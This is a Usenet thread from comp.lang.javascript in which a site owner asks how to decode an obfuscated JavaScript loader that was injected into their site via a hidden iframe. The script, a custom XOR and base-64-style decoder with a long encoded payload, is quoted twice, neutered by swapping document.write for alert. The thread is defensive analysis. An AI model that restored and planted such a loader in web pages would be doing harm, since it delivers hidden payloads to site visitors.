Decoder for obfuscated code?

[zsisco]

Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}


dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHN[email protected][email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3C[email protected]QsXRdgIRfCrRwWqQjCbO[email protected][email protected][email protected]@[email protected]nC7OZ9aS9J3UcxqQn5q90kmDq8rB[email protected]ro34ZFbQgw11JsX7PoIQGFVN[email protected][email protected][email protected][email protected][email protected]@[email protected][email protected]@[email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@jlGzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo6[email protected][email protected][email protected]@[email protected]@[email protected][email protected][email protected]@[email protected]@[email protected][email protected][email protected]mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmR[email protected]eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG79[email protected][email protected][email protected]jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGT[email protected]tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFA[email protected]iFq")

</script>

 

[zsisco]

The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}


dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHN[email protected][email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3C[email protected]QsXRdgIRfCrRwWqQjCbO[email protected][email protected]QsXRdgIRdCrRwWqQj5qB[email protected]@[email protected]nC7OZ9aS9J3UcxqQn5q90kmDq8rB[email protected]ro34ZFbQgw11JsX7PoIQGFVN[email protected][email protected][email protected][email protected][email protected]@[email protected][email protected]@[email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected]@[email protected][email protected][email protected]mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmR[email protected]eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG79[email protected][email protected][email protected]jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGT[email protected]tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFA[email protected]iFq")

</script>

 

[Dr John Stockton]

JRS: In article <[email protected]>,
dated Fri, 22 Sep 2006 13:59:01 remote, seen in
news:comp.lang.javascript, (e-mail address removed) posted :

Lines: 61

The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

Do not top-post or over-quote - see FAQ.

You can run it yourself and read the alert; or you can safely use a
textarea to display r. Then you will be able to see what it decodes to.


It's a good idea to read the newsgroup and its FAQ.

 

[zsisco]

Well genius if you had run it you would have seen that is not the
answer. Jeez, anyone else besides the good doctor have any ideas?